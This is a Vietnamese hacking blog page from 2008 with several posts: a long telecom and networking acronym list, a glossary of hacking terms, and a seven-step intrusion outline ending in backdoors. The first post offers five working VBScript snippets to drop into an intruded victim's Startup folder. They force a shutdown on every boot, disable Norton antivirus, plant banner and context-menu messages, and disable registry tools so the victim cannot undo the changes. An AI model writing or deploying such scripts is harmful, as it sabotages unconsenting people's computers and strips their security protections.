Vài trò đùa với các Victim
11 Tháng 6 2008 1 phản hồi
in Basic Hacking Thẻ:hack, hacking, trò đùa, victim
Khi các bạn đột nhập được vào máy người khác, tại sao không đùa với họ một tí nhỉ ?
Sau đây là một vài trò chơi do tôi nghĩ ra, bằng cách đặt một file (*.vbs) nằm trong thư mục Startup chứa một trong những đoạn script sau:
1.Trò chơi thứ nhất: không cho victim khởi động máy:
Dim wsh
Set wsh = createobject(“wscript.shell”)
wsh.run “RUNDLL32.EXE user.exe,exitwindows”
2.Trò chơi thứ hai: disable NAV( nếu có install) của họ:
Dim wsh
Set wsh= CreateObject( “WScript.Shell”)
s1 = “HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Norton Program
Scheduler\Start”
wsh.RegWrite s1,3, “REG_DWORD”
3.Trò chơi thứ ba: hiển thị môt meesage mỗi khi họ reboot máy:
dim wsh
Set wsh = CreateObject( “WScript.Shell” )
s1 = “HKLM\Software\Microsoft\Windows\CurrentVersion\WinLogon\”
s2 = “LegalNoticeCaption”
s3 = “LegalNoticeText”
wsh.RegWrite s1+s2, “Hackervn.org”
wsh.RegWrite s1+s3, “Robinhood invite you to join hackervn.org”
4.Trò chơi 4: hiển thị một dòng lệnh mỗi khi họ click vào một file hay folder:
set reg=createobject(“WScript.shell”)
reg.regwrite “HKEY_CLASSES_ROOT\*\Shell\Hello I am Robinhood-come from hackervn.org\”,”"
reg.regwrite “HKEY_CLASSES_ROOT\folder\shell\Hello I am Robinhood-come from hackervn.org\”,”Robinhood”
5.Trò chơi 5: trò chơi này đảm bảo cho các trò chơi trên có thể diễn ra “vui vẻ”: disable Registry của victim:
Dim objShell
Set objShell = CreateObject( “WScript.Shell” )
s1 = “HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\”
s2 = “Policies\System\DisableRegistryTools”
objShell.RegWrite s1+s2,1, “REG_DWORD”
Trên đây là 5 trò chơi “khá vui”, thật ra còn nhiểu trò chơi khác nũa nhưng “nguy hiểm” cho victim nên thôi.
Thuật ngữ Internet
11 Tháng 6 2008 2 phản hồi
in Basic Hacking Thẻ:hack, internet, thuật ngữ
Viết tắt Ý nghĩa
ABSBH: Average Busy Season Busy Hour
AC: Area code
ACC: Automatic Communications Control
ACC: Asynchronous Communications Center
ACD: Automatic Call Distributor
ACE: Automatic Calling Equipment
ACF: Advanced Communications Functions
ACN: Area Code + Number
ADPCM: Adaptive Differential Pulse Code Modulation
AIS: Automatic Intercept System
ALFE: Analog Line Front End
ALRU: Automatic Line Record Update
AM: Account Manager
AM: Access Module
AM: Amplitude Modulation
AMA: Automatic Message Accounting
AMSAT: American Satellite
AN: Associated Number
ANI: Automatic Number Identification
ANXUR: Analyzer for Networks with Extended Routing
AOSS: Auxiliary Operator Services System
AP: Attached Processor
ARC: Automatic Response Control
ARP: Address Resolution Protocol
ARPA: Advanced Reasearch Projects Agency
ARS: Automatic Response System
ARSB: Automated Repair Service Bureau
AT: Access Tandem
ATB: All Trunks Busy
ATH: Abbreviated Trouble History
ATM: Automated Teller Machine
ATM: Asynchronous Transfer Mode
AT&T: American Telegraph and Telephone Company
AVD: Alternate Voice Data
BCD: Binary Coded Decimal
BCUG: Bilateral CUG
BELLCORE: Bell Communications Research
BGP: Border Gateway Protocol
BHC: Busy Hour Calls
BLV: Busy Line Verification
BOC: Bell Operating Company
BOR: Basic Output Report
BOS: Business Office Supervisor
BSC: Binary Synchronous Module
BSCM: Bisynchronous Communications Module
BSOC: Bell Systems Operating Company
CA: Cable
CADV: Combined Alternate Data/Voice
CAMA: Centralized Automatic Message Accounting
CATLAS Centralized Automatic Trouble Locating & Analysis System
CAU: Controlled Access Unit
CAVD: Combined Alternated Voice/Data
CBC Cipher Block Chaining
CBS: Cross Bar Switching
CBX: Computerized Branch Exchange
CBX: Computerized Business Exchange
CC: Calling Card
CC: Common Control
CC: Central Control
CC: Country Code
CCC: Central Control Complex
CCC: Clear Channel Capability
CCC: Central Control Computer
CCIS: Common Channel Interoffice Signalling
CCITT: International Telephone and Telegraph Consultative Committee
CCM: Customer Control Management
CCNC: Common Channel Network Controller
CCNC: Computer Communications Network Center
CCS: Common Channel Signalling
CCSA: Common Control Switching Arrangement
CCSA: Common Central Switching Arrangement
CCSS: Common Channel Signalling System
CCT: Central Control Terminal
CCTAC: Computer Communications Trouble Analysis Center
CDA: Call Data Accumulator
CDA: Crash Dump Analyzer
CDA: Coin Detection and Announcement
CDAR: Customer Dialed Account Recording
CDC: Control Data Corporation
CDI: Circle Digit Identification
CDO: Community Dial Office
CDPR: Customer Dial Pulse Receiver
CDR: Call Dial Recording
CDS: Cicuit Design System
CEF: Cable Entrance Facility
CERT: Computer Emergency Response Team
CF: Coin First
CGN: Concentrator Group Number
CI: Cluster Interconnect
CIC: Carrier Identification Codes
CICS: Customer Information Control System
CID: Caller ID
CII: Call Identity Index
CIS: Customer Intercept Service
CISC: Complex Instruction Set Computing
CLASS: Custom Local Area Signalling Service
CLASS: Centralized Local Area Selective Signalling
CLDN: Calling Line Directory Number
CLEI: Common Language Equipment Identification
CLI: Calling Line Identification
CLID: Calling Line Identification
CLLI: Common Language Location Indentifier
CLNP: Connectionless Network Protocol
CMAC: Centralized Maintenance and Administration Center
CMC: Construction Maintenance Center
CMDF: Combined Main Distributing Frame
CMDS: Centralized Message Data System
CMIP: Common Management Information Protocol
CMS: Call Management System
CMS: Conversational Monitoring System
CMS: Circuit Maintenance System
CMS: Communications Management Subsystem
CN/A: Customer Name/Address
CNA: Communications Network Application
CNAB: Customer Name Address Bureau
CNCC: Customer Network Control Center
CNI: Common Network Interface
CNS: Complimentary Network Service
CO: Central Office
COC: Central Office Code
COCOT: Customer Owned Coin Operated Telephone
CODCF: Central Office Data Connecting Facility
COE: Central Office Equipment
COEES: Central Office Equipmet Engineering System
COER: Centarl Office Equipment Reports
COLT: Central Office Line Tester
COMSAT: Communications Satellite
COMSEC: Communications Security
COMSTAR: Common System for Technical Analysis & Reporting
CONS: Connection-Oriented Network Service
CONTAC: Central Office Network Access
COS: Class of Service
COSMIC: Common Systems Main Inter-Connection
COR: Class Of Restriction
COSMOS: Computerized System For Mainframe Operations
COT Central Office Terminal
CP: Control Program
CPBXI: Computer Private Branch Exchange Interface
CPC: Circuit Provisioning Center
CPD: Central Pulse Distributor
CPMP: Carrier Performance Measurement Plan
CRAS: Cable Repair Administrative System
CRC: Customer Record Center
CRC: Customer Return Center
CREG: Concentrated Range Extension & Gain
CRG: Central Resource Group
CRIS: Customer Record Information System
CRS: Centralized Results System
CRSAB: Centralized Repair Service Answering Bureau
CRT: Cathode Ray Tube
CRTC: Canadian Radio-Television and Telecommunications Commission
CSA: Carrier Servicing Area
CSAR: Centralized System for Analysis and Reporting
CSC: Cell Site Controller
CSC: Customer Support Center
CSDC: Circuit Switch Digital Capability
CSP: Coin Sent Paid
CSMA/CD: Carrier Sense Multiple Access/Collission Detection
CSR: Customer Service Records
CSS: Computer Special Systems
CSS: Computer Sub-System
CSU: Channel Service Unit
CT: Current Transformer
CTC: Channel Termination Charge
CTC: Central Test Center
CTM: Contac Trunk Module
CTMS: Carrier Transmission Measuring System
CTO: Call Transfer Outside
CTSS: Compatible Time Sharing System
CTSS: Cray Time Sharing System
CTTN: Cable Trunk Ticket Number
CTTY: Console TeleType
CU: Control Unit
CU: Customer Unit
CUG: Closed User Group
CWC: City-Wide Centrex
DA: Directory Assistance
DACC: Directort Assistance Call Completion
DAA: Digital Access Arrangements
DACS: Digital Access and Cross-connect System
DACS: Directory Assistance Charging System
DAIS: Distributed Automatic Intercept System
DAL: Dedicated Access Line
DAO: Directory Assistance Operator
DAP: Data Access Protocol
DARC: Division Alarm Recording Center
DARPA: Department of Defense Advanced Research Projects Agency
DARU: Distributed Automatic Response Unit
DAS: Device Access Software
DAS: Directory Assistance System
DAS: Distributor And Scanner
DAS: Dual Attachment Station
DASD: Direct Access Storage Device
DBA: Data Base Administrator
DBA: Digital Business Architecture
DBAC: Data Base Administration Center
DBAS: Data Base Administration System
DBC: Digital Business Center
DBM: Database Manager
DBMS: Data Base Management System
DBS: Duplex Bus Selector
DCA: Defense Communications Agency
DCC: Data Country Code
DCC: Data Collection Computer
DCE: Data Circuit-Terminating Equipment
DCE: Data Communicating Equipment
DCL: Digital Computer Language
DCLU: Digital Carrier Line Unit
DCM: Digital Carrier Module
DCMS: Distributed Call Measurement System
DCMU: Digital Concentrator Measurement Unit
DCO-CS: Digital Central Office-Carrier Switch
DCP: Duplex Central Processor
DCS: Digital Cross-Connect System
DCSS: Discontiguous Shared Segments
DCSS: Digital Customized Support Services
DCT: Digital Carrier Trunk
DDCMP: Digital Data Communications Message Protocol
DDD: Direct Distance Dialing
DDN: Defense Data Network
DDR: Datapac Design Request
DDS: Digital Data Service
DDS: Digital Data System
DDS: Dataphone Digital Service
DEC: Digital Equipment Corporation
DES: Data Encryption Standard
DF: Distributing Frame
DGC: Data General Corporation
DH: Distant Host
DID: Direct Inward Dialing
DIMA: Data Information Management Architecture
DINS: Digital Information Network Service
DIS: Datapac Information Service
DISA: Direct Inward System Access
DLC: Digital Loop Carrier
DLS: Dial Line Service
DM: Demultiplexer
DMA: Direct Memory Access
DN: Directory Numbers
DNA: Datapac Network Address
DNA: Digital Named Accounts
DNA: Digital Network Architecture
DNIC: Data Network Identifier Code
DNR: Dialed Number Recorder
DNS: Domain Name Service
DNS: Domain Name System
DOCS: Display Operator Console System
DOD: Department Of Defense
DOM: District Operations Manager
DPSA: Datapac Serving Areas
DPTX: Distributed Processing Terminal Executive
DSC: Data Stream Compatibility
DSI: Data Subscriber Interface
DSL: Digital Subscriber Line
DSN: Digital Services Network
DSU: Data Service Unit
DSU: Digital Service Unit
DSX: Digital Signal Cross-Connect
DTC: Digital Trunk Controller
DTE: Data Terminal Equipment
DTF: Dial Tone First
DTG: Direct Trunk Group
DTI: Digital Trunk Interface
DTIF: Digital Tabular Interchange Format
DTMF: Dual Tone Multi-Frequency
DTN: Digital Telephone Network
DTST: Dial Tone Speed Test
DVM: Data Voice Multiplexor
EAEO: Equal Access End Office
EA-MF: Equal Access-Multi Frequency
EBDI: Electronic Business Data Interchange
EC: Exchange Carrier
ECC: Enter Cable Change
EDC: Engineering Data Center
EDI: Electronic Data Interchange
EE: End to End Signaling
EEDP: Expanded Electronic Tandem Switching Dialing Plan
EGP: Exterior Gateway Protocol
EIES: Electronic Information Exchange System
EIU: Extended Interface Unit
EKTS: Electonic Key Telephone Service
ELDS: Exchange Line Data Service
EMA: Enterprise Management Architecture
EO: End Office
EOTT: End Office Toll Trunking
EREP: Environmental Recording Editing and Printing
ESA: Emergency Stand Alone
ESB: Emergency Service Bureau
ESN: Electronic Serial Number
ESP: Enhanced Service Providers
ESS: Electronic Switching System
ESVN: Executive Secure Voice Network
ETS: Electronic Tandem Switching
EWS: Early Warning System
FAC: Feature Access Code
FAM: File Access Manager
FCC: Federal Communications Commission
FCO: Field Change Order
FDDI: Fiber Distributed Data Interface
FDM: Frequency Division Multiplexing
FDP: Field Development Program
FEP: Front-End Processor
FEV: Far End Voice
FIFO: First In First Out
FIPS: Federal Information Procedure Standard
FM: Frequency Modulation
FMAP: Field Manufacturing Automated Process
FMIC: Field Manufacturing Information Center
FOA: First Office Application
FOIMS: Field Office Information Management System
FPB: Fast Packet Bus
FRL: Facilities Restriction Level
FRS: Flexible Route Selection
FRU: Field Replaceable Unit
FS: Field Service
FSK: Frequency Shift Keying
FT: Field Test
FTG: Final Trunk Group
FTP: File Transfer Protocol
FTPD: File Transfer Protocol Daemon
FX: Foreign Exchange
GAB: Group Access Bridging
GCS: Group Control System
GECOS: General Electric Comprehensive Operating System
GGP: Gateway-to-Gateway Protocol
GOD: Global Out Dial
GPS: Global Positioning System
GRINDER: Graphical Interactive Network Designer
GSA: General Services Administration
GSB: General Systems Business
GTE: General Telephone
HCDS: High Capacity Digital Service
HDLC: High Level Data Link Control
HLI: High-speed LAN Interconnect
HDSC: High-density Signal Carrier
HPO: High Performance Option
HUTG: High Usage Trunk Group
HZ: Hertz
IBM: International Business Machines
IBN: Integrated Business Network
IC: Intercity Carrier
IC: InterLATA Carrier
IC: Interexchange Carrier
ICAN: Individual Circuit Analysis Plan
ICH: International Call Handling
ICM: Integrated Call Management
ICMP: Internet Control Message Protocol
ICN: Interconnecting Network
ICPOT: Interexchange Carrier-Point of Termination
ICUG: International Closed User Group
ICVT: Incoming Verification Trunk
IDA: Integrated Digital Access
IDCI: Interim Defined Central Office Interface
IDDD: International Direct Distance Dialing
IDLC: Integrated Digital Loop Carrier
IDN: Integrated Digital Networks
IEC: Interexchange Carrier
IMP: Internet Message Processor
IMS: Information Management Systems
IMS: Integrated Management Systems
IMTS: Improved Mobile Telephone Service
INAP: Intelligent Network Access Point
INS: Information Network System
INTT: Incoming No Test Trunks
INWATS: Inward Wide Area Telecommunications Service
IOC: Interoffice Channel
IOC: Input/Output Controller
IOCC: International Overseas Completion Center
IP: Intermediate Point
IP: Internet Protocol
IPCF: Inter-Program Communication Facility
IPCH: Initial Paging Channel
IPCS: Interactive Problem Control System
IPL: Initial Program Load
IPLI: Internet Private Line Interface
IPLS: InterLATA Private Line Services
IPSS: International Packet-Switched Service
IRC: Internet Relay Chat
IRC: International Record Carrier
ISC: Inter-Nation Switching Center
ISDN: Integrated Services Digital Network
ISIS: Investigative Support Information System
ISO: International Standards Organization
ISSN: Integrated Special Services Network
ISU: Integrated Service Unit
ISWS: Internal Software Services
ITDM: Intelligent Time Division Multiplexer
ITI: Interactive Terminal Interface
ITS: Interactive Terminal Support
ITS: Incompatible Time-Sharing System
ITT: International Telephone and Telegraph
IVP: Installation Verification Program
IX: Interactive Executive
IXC: Interexchange Carrier
JCL: Job Control Language
JES: Job Entry System
KP: Key Pulse
LAC: Loop Assignment Office
LADS: Local Area Data Service
LADT: Local Area Data Transport
LAM: Lobe Access Module
LAN: Local Area Network
LAP: Link Access Protocol
LAPB: Link Access Protocol Balanced
LAPS: Link Access Procedure
LASS: Local Area Signalling Service
LASS: Local Area Switching Service
LAST: Local Area System Transport
LAT: Local Area Transport
LATA: Local Access Transport Area
LAVC: Local Area VAX Cluster
LBS: Load Balance System
LCDN: Last Call Directory Number
LCM: Line Concentrating Module
LCN: Logical Channel
LD: Long Distance
LDEV: Logical Device
LDM: Limited Distance Modem
LDS: Local Digital Switch
LEBC: Low End Business Center
LEC: Local Exchange Carrier
LEN: Low End Networks
LENCL: Line Equipment Number Class
LGC: Line Group Controller
LH: Local Host
LIFO: Last In First Out
LIP: Large Internet Protocol
LLC: Logical Link Control
LM: Line Module
LMOS: Loop Maintenance and Operations System
LSI: Large Scale Integration
LTC: Line Trunk Controller
LU: Local Use
LVM: Line Verification Module
MAC: Media Access Control
MAC: Message Authentication
MAN: Metropolitan Area Network
MAP: Maintenance and Administration Position
MAP: Manufacturing Automation Protocol
MAT: Multi-Access Trunk
MAU: Multistation Access Unit
MBU: Manufacturing Business Unit
MCA: Micro Channel Architecture
MCI: Microwave Communications, Inc.
MCP: Master Control Program
MCT: Manufacturing Cycle Time
MCU: Multi Chip Unit
MDR: Message Detail Record
MDS: Message Design Systems
MDU: Marker Decoder Unit
MF: Multi-Frequency
MFD: Main Distributing Frame
MFR: Mult-Frequency Receivers
MFT: Metallic Facility Terminal
MHZ: Mega-Hertz
MIB: Management Information Base
MIC: Management Information Center
MIF: Master Item File
MIS: Management Information Systems
MJU: MultiPoint Junction Unit
MLHG: Multiline Hunt Group
MLT: Mechanized Loop Testing
MNS: Message Network Basis
MOP: Maintenance Operation Protocol
MP: Multi-Processor
MPL: Multischedule Private Line
MPPD: Multi-Purpose Peripheral Device
MRAA: Meter Reading Access Arrangement
MSCP: Mass Storage Control Protocol
MSI: Medium Scale Integration
MTBF: Mean Time Between Failure
MTS: Message Telecommunication Service
MTS: Message Telephone Service
MTS: Message Transport Service
MTS: Mobile Telephone Service
MTSO: Mobile Telecommunications Switching Office
MTU: Maintenence Termination Unit
MUX: Multiplexer
MVS: Multiple Virutal Storage
MWI: Message Waiting Indicator
NAM: Number Assignment Module
NAS: Network Application Support
NC: Network Channel
NCCF: Network Communications Control Facility
NCI: Network Channel Interface
NCIC: National Crime Information Computer
NCP: Network Control Program
NCS: Network Computing System
NCTE: Network Channel Terminating Equipment
NDA: Network Delivery Access
NDC: Network Data Collection
NDIS: Network Device Interface Specification
NDNC: National Data Network Centre
NDS: Network Data System
NDU: Network Device Utility
NEBS: Network Equipment Building System
NECA: National Exchange Carriers Association
NFS: Network File Sharing
NFS: Network File System
NFT: Network File Transfer
NI: Network Interconnect
NI: Network Interface
NIC: Network Information Center
NIC: Network Interface Card
NJE: Network Job Entry
NLM: Netware Loadable Modules
NLM: Network Loadable Modules
NM: Network Module
NMR: Normal Mode Rejection
NOS: Network Operating System
NPA: Numbering Plan Area
NPA: Network Performance Analyzer
NSF: National Science Foundation
NSP: Network Services Protocol
NTE: Network Terminal Equipment
NUA: Network User Address
NUI: Network User Identifier
OC: Operator Centralization
OCC: Other Common Carrier
OD: Out Dial
ODA: Office Document Architecture
ODDB: Office Dependent Data Base
ODI: Open Data Interface
OGT: Out-Going Trunk
OGVT: Out-Going Verification Trunk
OIS: Office Information Systems
OLTP: On-Line Transaction Processing
ONI: Operator Number Identification
OPCR: Operator Actions Program
OPM: Outside Plant Module
OPM: Outage Performance Monitoring
OR: Originating Register
OS: Operating System
OSI: Open Systems Interconnection
OSL: Open System Location
OSS: Operator Services System
OST: Originating Station Treatment
OTC: Operating Telephone Company
OTR: Operational Trouble Report
OUTWATS: Outward Wide Area Telecommunications Service
PABX: Private Automated Branch Exchange
PACT: Prefix Access Code Translator
PAD: Packet Assembler/Disassembler
PADSX: Partially Automated Digital Signal Cross-Connect
PAM: Pulse Amplitude Modulation
PAX: Private Automatic Exchange
PBU: Product Business Unit
PBX: Private Branch Exchange
PC: Primary Center
PCM: Pulse Code Modulation
PCP: PC Pursuit
PFM: Pulse Frequency Modulation
PGA: Pin Grid Array
PIN: Personal Identification Number
PLA: Programmable Logic Array
PLD: Programmable Logic Device
PLS: Programmable Logic Sequencer
PM: Phase Modulation
PM: Peripheral Module
PMAC: Peripheral Module Access Controller
PMR: Poor Mans Routing
PNC: Primenet Node Controller
POC: Point of Contact
POF: Programmable Operator Facility
POP: Point of Presence
POS: Point Of Sale
POT: Point of Termination
POTS: Plain Old Telephone Service
PPN: Project Program Number
PPP: Point to Point Protocol
PPS: Public Packet Switching
PPSN: Public Packet Switched Network
PSAP: Public Safety Answering Point
PSDC: Public Switched Digital Capability
PSDCN: Packet-Switched Data Communication Network
PSDN: Packet-Switched Data Network
PSDS: Public Switched Digital Service
PSN: Packet-Switched Network
PSS: Packet-Switched Service
PSW: Program Status Word
PTE: Packet Transport Equipment
PTS: Position and Trunk Scanner
PTT: Postal Telephone & Telegraph
PVC: Permanent Virtual Call
PVN: Private Virtual Network
PWC: Primary Wiring Center
QPSK: Quadrature Phase-Shift Keying
RACF: Resource Access Control Facility
RAO: Revenue Accounting Office
RARP: Reverse Address Resolution Protocol
RBG: Realtime Business Group
RBOC: Regional Bell Operating Company
RC: Rate Center
RC: Regional Center
RDB: Relational Database
RDSN: Region Digital Switched Network
RDT: Restricted Data Transmissions
RDT: Remote Digital Terminal
REP: Reperatory Dialing
REXX: Restructured Extended Executer Language
RFC: Request For Comments
RIP: Routing Information Protocol
RIS: Remote Installation Service
RISC: Reduced Instruction Set Computer
RISD: Reference Information Systems Development
RJE: Remote Job Entry
RLCM: Remote Line Concentrating Module
RNOC: Regional Network Operations Center
ROTL: Remote Office Test Line
RPC: Remote Procedure Call
RPE: Remote Peripheral Equipment
RSA: Reference System Architecture
RSB: Repair Service Bureau
RSC: Remote Switching Center
RSCS: Remote Spooling Communications Subsystem
RSS: Remote Switching System
RSU: Remote Switching Unit
RTA: Remote Trunk Arrangement
RTG: Routing Generator
R/W: Read/Write
RX: Remote Exchange
SA: Storage Array
SABB: Storage Array Building Block
SAM: Secure Access Multiport
SARTS: Switched Access Remote Test System
SAS: Switched Access Services
SAS: Single Attachment System
SBB: System Building Block
SABM: Set Asynchronous Balanced Mode
SAC: Special Area Code
SBS: Satellite Business Systems
SC: Sectional Center
SCC: Specialized Common Carrier
SCC: Switching Control Center
SCCP: Signaling Connection Control Part
SCCS: Switching Control Center System
SCF: Selective Call Forwarding
SCF: Supervision Control Frequency
SCM: Station Class Mark
SCM: Subscriber Carrier Module
SCP: Signal Conversion Point
SCP: System Control Program
SCP: Service Control Point
SCR: Selective Call Rejection
SDLC: Synchronous Data Link Control
SF: Single-Frequency
SFE: Secure Front End
SIDH: System Identification Home
SIT: Special Information Tones
SLIC: Subscriber Line Interface Card
SLIM: Subscriber Line Interface Module
SLIP: Serial Line Internet Protocol
SLS: Storage Library System
SLU: Serial Line Unit
SM: System Manager
SMDI: Storage Module Disk Interconnect
SMDR: Station Manager Detail Recording
SMI: System Management Interrupt
SMP: Symmetrical Multi-Processing
SMS: Self-Maintenance Services
SMS: Station Management System
SMTP: Simple Mail Transfer Protocol
SNA: Systems Network Architecture
SNMP: Simple Network Management Protocol
SONDS: Small Office Network Data System
SOST: Special Operator Service Treatment
SP: Service Processor
SPC: Stored Program Control
SPCS: Stored Program Control System
SPCSS: Stored Program Control Switching System
SPM: Software Performance Montior
SQL/DS: Structured Query Language/Data System
SRC: System Resource Center
SS: Signaling System
SSAS: Station Signaling and Announcement System
SSCP: Systems Service Control Point
SSCP: Subsystem Services Control Point
SSP: Switching Service Points
SSS: Strowger Switching System
ST: Start
STC: Service Termination Charge
STD: Subscriber Trunk Dialing
STP: Signal Transfer Point
STS: Synchronous Transport Signal
SVC: Switched Virtual Call
SWG: Sub Working Group
SxS: Step-by-Step Switching
T-1: Terrestrial Digital Service
TAC: Trunk Access Code
TAC: Terminal Access Circuit
TAC: Terminal Access Center
TAS: Telephone Answering Service
TASI: Time Assignment Speech Interpolation
TBU: Terminals Business Unit
TC: Toll Center
TCAP: Transaction Capabilities ApplicationPart
TCC: Technical Consulting Center
TCC: Telecommunications Control Computer
TCF: Transparent Connect Facility
TCM: Time Compression Multiplexing
TCP: Transmission Control Protocol
TDAS: Traffic Data Administration System
TDCC: Transport Data Coordinating Committee
TDM: Time Division Multiplexer
TDMS: Terminal Data Management System
TDS: Terrestrial Digital Service
TH: Trouble History
TIDE: Traffic Information Distributor & Editor
TIS: Technical Information Systems
TLB: TransLAN Bridge
TM: Trunk Module
TMSCP: Tape Mass Storage Control Protocol
TNDS: Total Network Data System
TNPS: Traffic Network Planning Center
TO: Toll Office
TOP: Technical Office Protocol
TOPS: Traffic Operator Position System
TP: Transport Protocol
TP: Toll Point
TP: Transaction Processing
TPC: Transaction Processiong Performance Council
TREAT: Trouble Report Evaluation and Analysis Tool
TRIB: Throughput Rate in Information Bits
TRT: Tropical Radio and Telephone
TSB: Time Shared Basic Environment
TSG: Timing Signal Generator
TSN: Terminal Switching Network
TSO: Time Sharing Option
TSPS: Traffice Service Position System
TTL: Transistor-to-Transistor Logic
TTS: Trunk Time Switch
TWX: Type Writer Exchange
UA: Unnumbered Acknowledgement
UAE: Unrecoverable Application Error
UART: Universal Asynchronous Receiver Transmitter
UCS: Uniform Communication Standard
UDC: Universal Digital Channel
UDP: User Datagram Protocol
UDVM: Universal Data Voice Multiplexer
UID: User Identifier
UPC: Utility Port Conditioner
USC: Usage Surcharge
USDN: United States Digital Network
USTS: United States Transmission Systems
UUCP: Unix to Unix Copy Program
VAN: Value Added Networks
VAX: Virtual Address Extention
VCPI: Virtual Control Program Interface
VDU: Visual Display Unit
VF: Voice Frequency
VFU: Vertical Forms Unit
VFY: Verify
VIA: Vax Information Architecture
VLM: Virtual Loadable Module
VLSI: Very Large Scale Integration
VMB: Voice Mail Box
VMCF: Virtual Machine Communications Facility
VMS: Virtual Memory System
VMS: Voice Mail System
VM/SP: Virtual Machine/System Product
VPA: VAX Performance Advisor
VPS: Voice Processing System
VSAM: Virtual Storage Access Method
VSE: Virtual Storage Extended
VTAM: Virtual Telecommunications Access Method
VTOC: Volume Table Of Contents
VUIT: Visual User Interface Tool
VUP: Vax Unit of Processsing
WAN: Wide Area Network
WATS: Wide Area Telecommunications System
WATS: Wide Area Telephone Service
WC: Wiring Center
WCPC: Wire Center Planning Center
WDCS: Wideband Digital Cross-Connect System
WDM: Wavelength Division MultiPlexing
WES: Western Electronics Switching
WUI: Western Union International
XB: Crossbar Switching
XBAR: Crossbar Switching
XBT: Crossbar Tandem
XNS Xerox Network Systems
XSV Transfer Cost System Value
XTC Extended Test Controller
*** View full edit in http://www.fantomas311.net/
Shell
Là chương trình giữa bạn và Linux (hay nói chính xác hơn là giữa bạn với nhân Linux). Mỗi lệnh bạn gõ ra sẽ được Shell diễn dịch rồi chuyển tới nhân Linux. Nói một cách dễ hiểu Shell là bộ diễn dịch ngôn ngữ lệnh, ngoài ra nó còn tận dụng triệt để các trình tiện ích và chương trình ứng dụng có trên hệ thống…
Traceroute
Là chương trình cho phép bạn xác định được đường đi của các gói packets từ máy bạn đến hệ thống đích trên mạng Internet.
Cú pháp : tracert IPhost
Ví dụ : tracert 203.94.12.54
Daemon
Daemon (hay còn được gọi là “service”) là một chương trình chạy trên một cổng nhất định nào đó. Nó sẽ chịu đáp ứng lại mọi yêu cầu của client khi client này kết nối đến server trên cổng đó. Ví dụ như smtp daemon theo mặc định chạy trên cổng 25. Để có thể check mail, máy của bạn phải kết nối đến server này trên cổng 25, cổng mà smtp daemon đang nắm giữ!
RFC
Là chữ viết tắt của “Request For Comment”, là tập hợp những tài liệu về kiến nghị, đề xuất và những lời bình luận liên quan trực tiếp hoặc gián tiếp đến công nghệ, nghi thức mạng INTERNET. Các tài liệu RFC đựợc chỉnh sửa, thay đổi đến khi tất cả các kỹ sư thành viên của IETF (Internet Engineering Task Force) đồng ý và duyệt, sau đó những tài liệu này được xuất bản và được công nhận là 1 chuẩn, nghi thức cho Internet. Tài liệu RFC nổi tiếng và làm tạo được tiếng vang lớn nhất là tài liệu RFC số 822 về Internet Email bởi Dave Crocker.
SYN
Là chữ viết tắt của “The Synchronous Idle Character” nghĩa là ký tự đồng bộ hoá. Đầu tiên, A sẽ gửi cho B yêu cầu kết nối và chờ cho B trả lời. Sau khi B nhận được yêu cầu này sẽ trả lời lại A là “đã nhận được yêu cầu từ A” (ACK) và “đề nghị trả lời lại để hoàn thành kết nối” (SYN). Đến lúc này, nếu A trả lời lại
“đồng ý” (SYN) thì kết nối sẽ được tạo
SQL Injection
Là một trong những kiểu hack web đang dần trở nên phổ biến hiện nay. Bằng cách inject các mã SQL query/command vào input trước khi chuyển cho ứng dụng web xử lí, bạn có thể login mà không cần username và password, remote execution, dump data và lấy root của SQL server. Công cụ dùng để tấn công là một trình duyệt web bất kì, chẳng hạn như Internet Explorer, Netscape, Lynx, …
Vulnerability
Là một vùng, điểm dễ bị tổn thương trong hệ thống theo một yêu cầu được phát hiện ra, một đặc điểm hay một tiêu chuẩn, hay một vùng không được bảo vệ trong toàn bộ an ninh của hệ thống mà để lại cho hệ thống các điểm dễ bị tấn công hoặc chịu ảnh hưởng các vấn đề khác. Các Hacker thường dựa vào đây để khai thác
Debug
Là chương trình đi kèm với DOS-dĩ nhiên là mọi version của Win đều có chương trình này. Đây là một công cụ tuyệt vời để gỡ rối chương trình,unassembling và cracking,đọc bộ nhớ bị che giấu như boot sector và nhiều hơn nữa… Yêu cầu các bạn phải biết assembly mới dùng được debug
ARP
Là chữ viết tắt của “Address Resolution Protocol”. Giao thức TCP/IP được sử dụng để liên kết động một địa chỉ IP cấp cao vào một địa chỉ phần cứng cấp thấp
Web spoofing
Là một dạng tấn công cho phép một người nào đó xem và chỉnh sửa mọi trang web gửi đến máy nạn nhân. Họ có thể theo dõi mọi thông tin do nạn nhân điền vào các form. Điều này đặc biệt nguy hiểm với những thông tin cá nhân như địa chỉ,số thẻ tín dụng,số tài khoản ngân hàng,mật mã truy cập vào tài khoản đó…. Web spoofing hoạt động trên cả IE lẫn NETSCAPE.Nó hoạt động dựa vào việc giao thức SSL được dùng như một dạng giấy chứng nhận cho những Website xác thực. Việc tấn công theo kiểu này có thể được thi hành bằng cách dùng Javascript và Web server plug-ins
by fantomas311
Suy nghĩ như 1 hacker
11 Tháng 6 2008 Để lại phản hồi
in Basic Hacking Thẻ:hack, hacker, hacking
Suy nghĩ như một hacker thành công không khác lắm so với một nhà thiết kế giỏi. Các hacker thành công nhất tuân theo 1 phương pháp đặc trưng mà họ đã phát triển qua thời gian. Họ áp dụng các bước trong tài liệu một cách chi tiết, cẩn thận và kiên nhẫn trong công việc của mình, rất giống như các những người thiết kế.
Mục tiêu của hacker là thâm nhập vào chưong trình ứng dụng hay 1 mục tiêu định sẵn. Hacker bắt đầu với rất ít hay gần như không có thông tin về mục tiêu tấn công , tuy nhiên, đến khi kết thúc việc phân tích, thì kẻ tấn công đã xây dựng nên một bản đồ đường đi chi tiết cho phép họ thâm nhập vào mục tiêu. Điều này chỉ có thể đạt được thông qua các lần phân tích cẩn thận và một cách tiếp cân có phương pháp để nghiên cứu về kẻ-sớm-là-nạn-nhân.
Phương pháp có hệ thống của hacker nhìn chung bao gồm 7 bước theo thứ tự sau :
1. Thực hiên một phép phân tích “dấu chân”
2. Liệt kê các thông tin
3. Đoạt quyền truy nhập hệ thống thông qua thao tác với tư cách người sử dụng
4. Leo thang các đặc quyền
5. Thu thập thêm các mật khẩu và các bí mật.
6. Tạo lập “cửa sau.” (backdoor)
7. Đánh bung hệ thống.
